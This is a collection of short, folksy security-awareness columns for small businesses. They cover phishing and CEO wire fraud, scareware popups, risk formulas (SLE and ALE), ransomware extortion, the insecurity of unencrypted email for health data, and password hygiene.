Gone Phishin’

Happy to Help: An entry level accountant, “Sebastian”, receives an email from his CEO. Sebastian is excited the CEO recognizes him and needs his help on a major acquisition. The CEO requests a wire of 50 million Euros immediately sent to a bank account for the acquisition. Sebastian quickly executes the transfer. He feels like a hero. He can almost smell that promotion.

Oops: Unfortunately for Sebastian, and his large Austrian aerospace company, FACC, the email was not from his CEO. This was one of the most profitable phishing expeditions ever. The company could only recover 20% of the funds.  The CEO was fired and most likely, Sebastian. 

Phishing: Phishing is a type of cyber-attack that uses email to trick the recipient into doing some particular action or providing private information.  The term was coined in 1995 as a variant of fishing and refers to the “bait” used to get the victim to “bite.”   There are several variations of phishing.  Whaling refers to targeting high-level personnel in an organization.   Spear phishing refers to a phishing attack targeting a specific group of people like the military, a specific company, or certain professionals.

More Complex Today: With the techniques used today, it is not always simple to identify a phishing attack.  Although the Nigerian Prince scam, with its poor grammar and misspelled words, is still around, there are new scams that look extremely legitimate and appear to be from legitimate organizations. 

What to Watch For: Here are some methods to skillfully spot the phishing email. If an email is asking for personal information or asking you to verify details like bank or credit card information, don’t take the bait.  Established companies never ask for sensitive information. Be cautious of emails presenting dire warnings and potential consequences which require urgent action. Some examples might be a warning that an account of yours has expired or has been hacked.  Similarly, be wary if there is an urgent deadline to go along with the dire consequences.  Another common phishing tactic is to offer large financial rewards. This could be winning a lottery that you did not enter or being the prize-money winner for a bogus contest. If it sounds too good to be true, it probably is. 

What Next?: Now that you are starting to smell something phishy, how do you determine what to do? First, don’t click on the provided link, if there is one.  Hover over the link and look at the bottom left corner of your browser or email client.  It should show the full web address.  Some bogus web addresses will have extra words or letters added which do not belong to the legitimate address. Carefully scrutinize the address. (For example, g00gle is not the same as google.)  Also, beware of short URLs (hyperlinked website addresses).  Hackers can hide their true address inside a tiny URL link.  When you get an email that seems like it really came from your bank, for example, mentioning dire consequence and an urgent deadline, call the bank using a number YOU KNOW is good, or check the official website. (Google the website; don’t click the link in the email to determine if the email is legitimate.)  Many spear phishing attacks can be thwarted with policies requiring a second method of approval prior to email requests for funding (which Sebastian should have looked for).

Protection: To protect your business, you should look at increasing your cyber defenses. This may be something like using email services that stop most phishing attempts. Businesses can use email certificates to digitally sign emails so recipients can verify they came from you.  

The Keys: Training and awareness are the key.  There are services you can leverage that provide phishing training. It’s even better if the training also includes simulated phishing attempts targeting your employees to determine how well the training is sinking in.

Perhaps if “Sebastian” from FACC had the proper training, he might still be enjoying his employment there – along with his CEO. 

On A Hot Day

Not The Droids You’re Looking For: On a hot day (which was not unusual for the desert planet of Tatooine), overlooking the Mos Eisley space port, the Jedi master warned his freshly-minted apprentice to be careful, with good reason. No sooner had they hovered into town in the weathered X-34, when they were stopped at an impromptu checkpoint. The gleaming troopers searching for stolen imperial plans demanded to see identification. Waving his aged fingers, the holy man muttered, “You don’t need to see his identification.” In a perplexing turn of events, the menacing guard robotically repeated those words, thereby blasting that exchange into galactic popular culture.

Cyber Jedi Mind Tricks: You may compare your computer to the weak-minded fools vulnerable to a Jedi mind trick: It does what it is programmed to do. Nothing more. For example, when an operating system looks for files (like when it hunts for malware), it does so in a methodical manner. Malware authors know how this is done, and they modify the list the operating system uses to find files, hiding their secret plans deep in the file system. They may even modify registry settings, install additional user accounts, and set up scheduled tasks.

Defender: According to several reputable sources, the Windows Defender component of Windows 10 is all the antivirus you need. It will take care of commodity malware, and it does so quietly. It doesn’t alert you when it finds malicious files. That’s good and bad. You won’t have a lot of alerts you have to investigate–that’s good, but you also won’t have a lot of alerts to investigate–that’s bad. You want to know when you get infected, so you can do something about it.

Don’t Fall For It: You also need to be aware and avoid falling for the Jedi mind trick yourself. It may come to you in the form of a popup, warning you that your computer is infected. It’s a lie. Don’t click anything in that window of warning. The red “x” in the upper right corner isn’t the close button. Every part of that window is the “install” button. Instead of clicking anywhere in that window, use the Windows Task Manager to find your browser instances, and end the task on all of them.

If Infected: What do you do if your computer legitimately becomes infected with malware? Like the stormtroopers on Tatooine, you can systematically check the identification of every program, and visit every mysterious dark hole within the Windows Operating System; however, be aware there are Jedi that will prevent your successful search. The most effective way to be sure you’ve deleted all the secret plans the malware left behind is to reinstall the operating system then reinstall all the necessary programs. Just make sure you create a backup of all your irreplaceable files before you do.

Let’s just be clear: Malware wants to hide, and it’s very good at it. A knot of Stormtroopers  fitted with pure white armor briefly interrupted the Jedi concerning his mismatched metal companions at Mos Eisley. They were rebuffed. You will be rebuffed if you think you can find the malicious secret plans embedded in your computer.

We Have A Problem

Risks While Fishing?: A few weeks ago, I was fishing in the White Mountains. Fishing, not catching, but that was ok. I was there to escape the steadily building heat of a Sierra Vista June, and to receive lessons in patience and perseverance. While the former was intended, the latter was an unwelcomed bonus. Everything was going according to plan. The weather was enviable. White puffy clouds cast occasional shadows that provided mild relief for a beleaguered amateur angler, and the pine scented air had an unexpected autumn crispiness. Then my fourth and last golden Acme Kastmaster snagged on a mossy rock in the middle of the East Fork of the Black River (which was more of a creek really). I had a choice to make. Retrieve the lure and try, try again; or snap the line and accept defeat.

Assess: I was alone on the river and miles from help. What if I slipped? A good friend slipped on a rock in THIS river; after facing THIS choice. The difference was he had a family to drive him the 30 minutes or so to Springerville for his fiberglass arm charm.

Choices: We all have to make choices every day. Maybe not this exact choice, but still choices that involve risk. Without even thinking, most of us can conduct risk assessments in real-time. Risk is a function of probability, impact, and asset value. In the scenario I was facing, the probability of a fall was somewhat likely, the impact of a fall COULD have been high, and the asset was either my arm, or my life. Again, high. A quick mental calculation contrasted with ending my fishing trip early and I stepped solidly into the river. My worn leather ropers quickly filled with cool river water.  I found sturdy footing and successfully rescued the remainder of my fishing excursion.

Business Risks: By now you’re asking me, “Tom, is this Field and Stream, or the Cyber Tripwire?” Stay with me. I’m getting to the point. On your business computer network, you have assets. I want you to calculate something. If you went into work today, and found that none of your computers worked, what would be the monetary loss? What if it took a week to recover? Now, I’m no Dallin Haws, so you may want to check with him first. But here is a recommendation from Dr. Eric Cole one of the leading cyber security experts in the country.

Calculating Risks: In calculating risk, two general formulas are used: SLE (single loss expectancy) and ALE (annualized loss expectancy). SLE is the starting point. With it you determine the single loss resulting from a malicious incident. The formula for SLE is:

SLE = asset value x exposure factor

While the SLE is a valuable starting point it only represents the loss for one incident. Since many organizations suffer the same loss multiple times a year, you have to include the ARO (annualized rate of occurrence) and use them both to calculate the ALE:

ALE = SLE x ARO

The ALE is what you always use to determine the cost of the risk and the TCO (total cost of ownership) and is used to calculate the cost of a solution.

Your Cybersecurity Budget: So, this leads to the question. How much should you spend on cyber security prevention, detection, deterrence, and recovery? Calculate the ALE, and spend less than that annually.

In retrospect, I probably should have cut bait on the river that day. The consequences could have been disastrous. But for your business, the consequences could be far worse if you remain in the dark regarding risk.

Riddled by Ransomware

Ransomware. The word sends chills up your spine; or it should. Ransomware is essentially a cyber-criminal holding hostage your digital life in a binary bag. Cyber-criminals do this by zipping all your important, irreplaceable files and setting a password on them. The crooks “generously” offer to sell you the password for a “minor” fee. Truth is, the fee is not so minor, nor convenient.

How It’s Delivered: Most ransomware comes as either an email attachment, or it comes by infecting you when you visit a compromised website. For example, a few weeks ago, the actual website for the World Health Organization was compromised and serving up malware to every visitor to the site!

Protection: You used to protect yourself from this type of attack by creating a daily backup of your critical files. Files like Quickbooks, family photos, and the digital scan of your high school diploma. I said keeping backups used to work. The crooks have changed their tactics. As more and more of us got better at backing up our files, fewer and fewer of us paid the ransom; therefore, we cut into their profits. That’s bad for business.

Lockout or Stealing: Before, they just stole your access to the files by encrypting them. Now they actually steal copies of the files. If you don’t pay up, they will dump your files on the dark web–not to the highest bidder–but for free. Maybe you’re not concerned if your pictures of Fluffy end up in the darkest corners of the Internet, but how about your Quickbooks, or the scans of your birth certificate, social security card and driver’s license? It is not uncommon (nor is it recommended), for people to keep spreadsheets of all their bank and investment account numbers and the associated usernames and passwords. These are certainly not the files you want to become public!

Anti-Virus Enough? I know what you’re thinking. “I have anti-virus so I don’t have to worry, right?” Wrong. Your antivirus won’t stop it. If it could, you’d rarely hear about these attacks in the news. Don’t delete it though; it will stop some malware.

Two Keys: It is imperative for every user to do two things. First, ensure you don’t surf the web with an account that has administrator privileges. Second, become suspicious of EVERY email you receive; if your gut tells you an email looks “fishy”, then it is probably “phishy”. Additionally, if you receive an email, and the tone is one intended to terrify you with dire consequences for inaction, be on your guard. That is a favorite tactic of cyber-crooks.

Helpful Hint: One last suggestion, if you do store critical files like those I mentioned, then you should zip them and password-protect them yourself with an annoyingly long password. Finally write the password in a book and lock it in your desk drawer. If you follow this recommendation, it won’t matter if those files get dumped onto the dark web, because you have protected them.  You turned the tables on crooks. They will be unaware that the bag they hold is filled with digital dust.

The Dangers of Unencrypted Email

Postcards from War: Recently, I was reading some of my grandfather’s faded postcards from World War I. I happened to read one in which he mentioned being released from quarantine: March 11, 1918, Fort Lewis, Washington – the Spanish Flu pandemic.

Then & Now: Postcards were how our grandparents sent brief messages over long distances. They are the antique analogs to modern email. The messages and attachments you send via email are every bit as private and secure as that dusty, old postcard.

Is This Normal: Recently, a close associate of mine, I’ll call him “John”, was required to take a defensive driving course. The business providing the service asked John to send a copy of his driver’s license. John promptly took a picture of his driver’s license in beautiful, high-definition color and attached it to an unsecure email. He didn’t even question it.

How It Works: Let’s look momentarily at a seemingly benign example to illustrate what happens when you hastily click the “send” button. Say you work for a medical practice and you send an email from your office to a patient. Here’s what happens:

  1. The email leaves your computer.
  2. It travels on your Internet Service Provider’s (ISP) network.
  3. It arrives at your mail server – a server you probably don’t control.
  4. Your hosted email provider then forwards a copy of the email to the patient’s mail server, probably webmail, like Gmail.
  5. A copy of the email languishes on the mail provider’s server.
  6. It then takes the last leg of the journey to land on the patient’s personal computer.

Everybody Sees It: As you can see, at any of those points, the email (like a postcard) can be read by anyone with access. That means, if any of those computers storing a copy of the emails is compromised, so are the emails. All of them.

Unsecure By Design: Email is by design, unsecure. That is why you should never, (let me repeat, EVER) include any important, private information in any email, not just the protected health information (PHI) of patients. Unencrypted email is simply the wrong medium for transmitting sensitive data.

From the hhs.gov website:

Patients may initiate communications with a provider using e-mail. If this situation occurs, the health care provider can assume (unless the patient has explicitly stated otherwise) that e-mail communications are acceptable to the individual.

For Healthcare: Now, I’m not a HIPAA lawyer, and this is not legal advice, but basically, if you are a medical practice, you know that much of your communication with patients is over email. In fact, many prefer it. So as long as you warn the patient that your email communication is over unsecure media, and the patient acknowledges, then you may be absolved of the consequences of a PHI breach … maybe. You can even get patient acknowledgment with (ironically) a simple email waiver form that the patient signs and returns to your office, over email.

Secure Options: If you only send PHI through your Electronic Medical Record’s application, it may take care of the encryption for you. But if not, there are email providers that will encrypt your emails. If you use Microsoft Office 365, there is a tier that will allow you to encrypt email. Other email providers like ProtonMail offer encryption capabilities. A Chrome extension even exists allowing you to encrypt Gmail. It can be a little inconvenient because you have to think up a strong password for each email, then you have to deliver the password to your patient by calling or texting them. If emails containing sensitive data are sent infrequently, the risk is lower. You decide whether you’d rather go through the effort or experience a breach.

You don’t have to protect sensitive data forever. Its value degrades over time. Conversely, that little postcard my grandfather hastily scrawled over 100 years ago is ever more precious to me. 

Passwords Are Like Dental Floss

Flossing is Hard: Passwords are the dental floss of the internet. They take precious time to use, everyone hates them, they cause mild discomfort, and the consequence of negligence could spell doom. Not immediate doom. But eventual in inevitable doom. Oh and by the way, China knows your password! Your favorite one. The really complex one you made up 6 years ago that combines your sister’s phone number, your son’s birthday, and the exclamation point at the end. They also know your other favorite one. “Sweetie”.

Password Strength: Last week I gave you a tripwire you could use to foil a ransomware attacker with a strong password.  Continuing the theme, this week we discuss the importance of password hygiene.  Password hygiene involves the strength, uniqueness, and practices of passwords.

The Longer the Better: Compare password hygiene to dental floss hygiene – make them long, change frequently, and don’t share. When it comes to length, longer = stronger. In fact, length is more important than complexity.  So instead of using a complex array of gibberish letters, numbers and symbols, the best practice is to create a passphrase.  A passphrase is a list of unrelated common words. It is easier to for you to remember and harder for a computer to crack. In this example from www.xkcd.com/936/ , the password Tr0ub4dor&3 is difficult to remember but can be cracked in 3 days.  However, if we tie four common unrelated words together like “correct horse battery staple”, it would take 550 years to crack.

Don’t Re-use Your Floss: You may question, “If I create one strong passphrase, I could use it for all my accounts and I’ll be safe?” Well, not exactly.  That’s where the second part of “treat-passwords-like-dental-floss” comes in. Don’t share. Today, you have so many accounts with passwords to remember.  You have your email, company login, bank, investment, social media, gaming … the list goes on.  Major breaches like LinkedIn and DropBox have exposed your username (typically your email address) and password.  The information from these breaches eventually ends up on the Dark Web available for any cyber-criminal to peruse. To see if your email address is on the Dark Web, you can check it at www.haveibeenpwned.com.   A trusted advisor can offer Dark Web checks for your business domains. 

Try It Everywhere: When the hacker acquires your credentials, they will test them against popular websites hoping you reused the password. Maybe you have a Wells Fargo, or Merrill Lynch account with the same username and password. If they succeed, the consequences could be disastrous.

Password Managers: You may want to reconsider letting your browser manage your passwords. The saved password feature of browsers is great for ease of use for you – and a cyber-criminal.  These passwords are stored in clear text in the browser can easily be stolen.  

Consider the Consequences: Since there are so many long passwords to remember, using a Password Manager can ease your password woes.  A Password Manager can create, encrypt, store, and autofill your passwords for multiple accounts and make it harder for hackers to get them.  Password managers can also protect you from Some recommend free managers are:  Apple Key Chain,  Bitwarden and KeePass.  You may hate to floss. You may hate password hygiene. But until there is something better, consider the consequences.